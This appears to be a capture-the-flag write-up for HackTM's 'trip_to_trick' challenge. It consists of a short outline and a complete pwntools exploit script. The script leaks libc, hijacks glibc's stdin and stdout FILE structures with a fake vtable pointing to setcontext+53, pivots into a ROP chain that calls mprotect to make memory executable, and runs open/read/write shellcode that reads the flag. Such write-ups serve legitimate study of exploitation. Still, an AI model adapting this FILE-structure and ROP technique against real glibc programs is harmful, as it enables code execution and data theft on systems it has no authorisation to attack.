
[hacktmctf] trip_to_trick

1. stdin._IO_buf_base -> stdin

2. stdin._IO_buf_base = stdout, stdin._IO_buf_end = stdout + 0x2000 (so the next refill of stdin writes 0x2000 bytes over stdout)

3. stdout.vtable = _IO_helper_table

4. _IO_helper_table.sysclose = setcontext + 53

5. ROP chain that calls mprotect(..., 0x3000, RWX) on the overwritten region, then open/read/write shellcode that prints the flag

 

import sys
from pwn import *
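# Exploit for "trip_to_trick" (hacktmctf).  Runs under either Python 2 or
# Python 3 pwntools (bytes literals, print() as a function).
#
# Stages (see the outline above):
#   1. write primitive: stdin._IO_buf_base -> &_IO_2_1_stdin_
#   2. the next stdin read lands on stdin's own header: buf_base/buf_end are
#      re-pointed at [stdout, stdout + 0x2000)
#   3. the read after that overwrites stdout's FILE, a fake vtable, shellcode
#      and a ROP chain in one go; the vtable slots are all setcontext+53
#   4. setcontext+53 pivots the stack into our data, ROP calls mprotect(RWX),
#      then returns into the open/read/write shellcode

BINARY = './trip_to_trick'

# The write-up was published with the remote target and its libc blanked out;
# fill these in before running with 'r'.
REMOTE_HOST = ''
REMOTE_PORT = None
REMOTE_LIBC = ''

FLAG_PATH = '/root/pwn/flag'

# Offsets from the libc base.  All of them belong to the one libc build the
# challenge shipped: the original script wrote several of them as
# "<runtime address> - <runtime libc base>" copied from a debugging session.
# None of them will match another glibc build -- re-derive them if the libc
# changes.
POP_RDI = 0x26542            # pop rdi ; ret
POP_RSI = 0x26f9e            # pop rsi ; ret
POP_RDX = 0x12bda6           # pop rdx ; ret
SETCONTEXT_SKIP = 53         # setcontext + 53: skips the sigprocmask part

# Values the fake stdout is refilled with.  They look like stdout's normal
# unbuffered-state fields (its own _shortbuf, stdin as _chain, the stdout lock
# and _IO_wide_data_1) -- TODO confirm against the target libc.
STDOUT_SHORTBUF = 0x1e57e3
STDOUT_CHAIN = 0x1e4a00
STDOUT_LOCK = 0x1e7580
STDOUT_WIDE_DATA = 0x1e48c0

# Layout of the 0x2000-byte region the stage-3 read writes starting at stdout:
#   [0x000, 0x0e0)  fake struct _IO_FILE for stdout
#   [0x0e0, 0x0f8)  three pointers (stderr, stdout, stdin)
#   [0x0f8, 0x200)  NOP-padded open/read/write shellcode
#   [0x200, 0x2a0)  fake vtable, 20 slots, every slot = setcontext+53
#   [0x2a0, ...)    pivot pointer, ROP chain, shellcode address
# The original hard-coded the fake vtable as libc+0x1e5960 and the shellcode
# as libc+0x1e5858; with this libc's stdout at libc+0x1e5760 those are exactly
# stdout+0x200 and stdout+0xf8, so they are derived from the layout here.
FILE_SIZE = 0xe0
SC_OFF = FILE_SIZE + 3 * 8    # 0xf8
SC_LEN = 0x108
VTABLE_OFF = SC_OFF + SC_LEN  # 0x200
VTABLE_SLOTS = 20


def open_target(mode):
    """Start the local binary or connect to the remote one.

    Returns (tube, libc ELF).  Exits with a message on an unknown mode or
    when the remote placeholders above are still blank.
    """
    if mode == 'l':
        p = process(BINARY)
        l = ELF(BINARY).libc
    elif mode == 'r':
        if not REMOTE_HOST or REMOTE_PORT is None or not REMOTE_LIBC:
            sys.exit("set REMOTE_HOST, REMOTE_PORT and REMOTE_LIBC before using 'r'")
        p = remote(REMOTE_HOST, REMOTE_PORT)
        l = ELF(REMOTE_LIBC)
    else:
        sys.exit("sys.argv[1] = r : remote l : local")
    return p, l


def leak_libc_base(p, l):
    """Parse the system() address the program prints and return the libc base."""
    p.recvuntil(b"0x")
    # recvn blocks until exactly 12 bytes arrived; recv(12) could return a
    # short read and silently produce a wrong base.  12 hex digits is the
    # width of a canonical 0x7f... user-space address.
    leak = int(p.recvn(12), 16)
    base = leak - l.sym['system']
    log.info("libc : " + hex(base))
    return base


def redirect_stdin_buffer(p, stdin):
    """Stage 1: point stdin._IO_buf_base (offset 0x38) at _IO_2_1_stdin_ itself.

    The binary's write primitive takes "<addr> <value>" as bare lowercase hex;
    '%x' is used instead of hex()[2:] so Python 2 can never append an 'L'.
    """
    p.sendline("%x %x" % (stdin + 0x38, stdin))


def build_stdin_header(stdout):
    """Stage 2: 0x48 bytes that land on the head of _IO_2_1_stdin_ (now its own buffer).

    Field names follow glibc's amd64 struct _IO_FILE.
    """
    hdr = p64(0xfbad208b)          # 0x00 _flags
    hdr += p64(stdout + 0xd8)      # 0x08 _IO_read_ptr
    hdr += p64(stdout) * 6         # 0x10 _IO_read_end .. 0x38 _IO_buf_base
    hdr += p64(stdout + 0x2000)    # 0x40 _IO_buf_end: next refill reads 0x2000 bytes at stdout
    return hdr


def build_stdout_region(libc, l, stdin, stdout, helper):
    """Stage 3: the 0x2000-byte refill that overwrites stdout and everything after it.

    ``helper`` must be ``stdout + VTABLE_OFF``: it is written into stdout's
    vtable slot and must point at the setcontext+53 array built below.
    """
    sc_addr = stdout + SC_OFF
    setcontext53 = libc + l.sym['setcontext'] + SETCONTEXT_SKIP

    # Fake struct _IO_FILE for stdout.  Offsets are the glibc amd64 layout.
    f = p64(0xfbad2887)                           # 0x00 _flags
    f += p64(libc + STDOUT_SHORTBUF) * 7          # 0x08 _IO_read_ptr .. 0x38 _IO_buf_base
    f += p64(libc + STDOUT_SHORTBUF + 1)          # 0x40 _IO_buf_end (one-byte buffer)
    f += p64(0) * 4                               # 0x48 _IO_save_base .. 0x60 _markers
    f += p64(libc + STDOUT_CHAIN)                 # 0x68 _chain
    f += p64(1)                                   # 0x70 _fileno = 1, _flags2 = 0
    f += p64(0xffffffffffffffff)                  # 0x78 _old_offset = -1
    f += p64(0)                                   # 0x80 _cur_column/_vtable_offset/_shortbuf
    f += p64(libc + STDOUT_LOCK)                  # 0x88 _lock
    f += p64(0xffffffffffffffff)                  # 0x90 _offset = -1
    f += p64(0)                                   # 0x98 _codecvt
    f += p64(libc + STDOUT_WIDE_DATA)             # 0xa0 _wide_data
    f += p64(0) * 3                               # 0xa8 _freeres_list, _freeres_buf, __pad5
    f += p64(0xffffffff)                          # 0xc0 _mode = -1
    f += p64(0) * 2                               # 0xc8 _unused2
    f += p64(helper)                              # 0xd8 vtable -> fake table
    assert len(f) == FILE_SIZE

    # Three pointers right after the struct -- presumably the stderr/stdout/
    # stdin FILE* variables that follow _IO_2_1_stdout_ in this libc; verify.
    f += p64(libc + l.sym['_IO_2_1_stderr_'])
    f += p64(stdout)
    f += p64(stdin)
    assert len(f) == SC_OFF

    # open(FLAG_PATH) / read(fd, rsp, 0x100) / write(1, rsp, 0x100), centred
    # in a NOP sled so that landing anywhere near sc_addr still runs it.
    context(arch="amd64", os="linux")
    orw = shellcraft.pushstr(FLAG_PATH)
    orw += shellcraft.open('rsp', 0, 0)
    orw += shellcraft.read('rax', 'rsp', 0x100)
    orw += shellcraft.write(1, 'rsp', 0x100)
    sc = asm(orw).center(0x50, b'\x90').ljust(SC_LEN, b'\x90')
    assert len(sc) == SC_LEN, "shellcode does not fit the 0x108-byte slot"
    f += sc
    assert len(f) == VTABLE_OFF
    assert helper == stdout + VTABLE_OFF

    # Fake vtable: whichever slot glibc calls through, it reaches setcontext+53.
    f += p64(setcontext53) * VTABLE_SLOTS

    # glibc's amd64 setcontext+53 loads rsp from [rdi+0xa0] and pushes
    # [rdi+0xa8] as the return address.  The pointer below sits at helper+0xa0
    # and POP_RDI at helper+0xa8, so this relies on rdi == helper when the
    # gadget fires -- not verified here.  The pointer doubles as the junk
    # word the first `pop rdi` consumes before the real chain starts.
    pivot = stdout + len(f)
    f += p64(pivot)

    # mprotect(page(shellcode), 0x3000, PROT_READ|PROT_WRITE|PROT_EXEC).  The
    # original aligned from the vtable address; aligning from the shellcode
    # (which precedes it by 0x108 bytes) is the same page here and never
    # misses the shellcode when a page boundary falls between the two.
    f += p64(libc + POP_RDI) + p64(sc_addr & ~0xfff)
    f += p64(libc + POP_RSI) + p64(0x3000)
    f += p64(libc + POP_RDX) + p64(7)
    f += p64(libc + l.sym['mprotect'])
    f += p64(sc_addr)                             # mprotect returns into the shellcode
    return f


def main():
    if len(sys.argv) != 2:
        print("sys.argv[1] = r : remote l : local")
        sys.exit(1)
    mode = sys.argv[1].strip()
    p, l = open_target(mode)
    pause()  # attach a debugger to the process here if needed

    libc = leak_libc_base(p, l)
    stdin = libc + l.sym['_IO_2_1_stdin_']
    stdout = libc + l.sym['_IO_2_1_stdout_']
    helper = stdout + VTABLE_OFF
    log.info("stdout : " + hex(stdout))
    log.info("HELPER : " + hex(helper))

    redirect_stdin_buffer(p, stdin)
    p.send(build_stdin_header(stdout))
    p.send(build_stdout_region(libc, l, stdin, stdout, helper))
    p.interactive()


if __name__ == '__main__':
    main()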
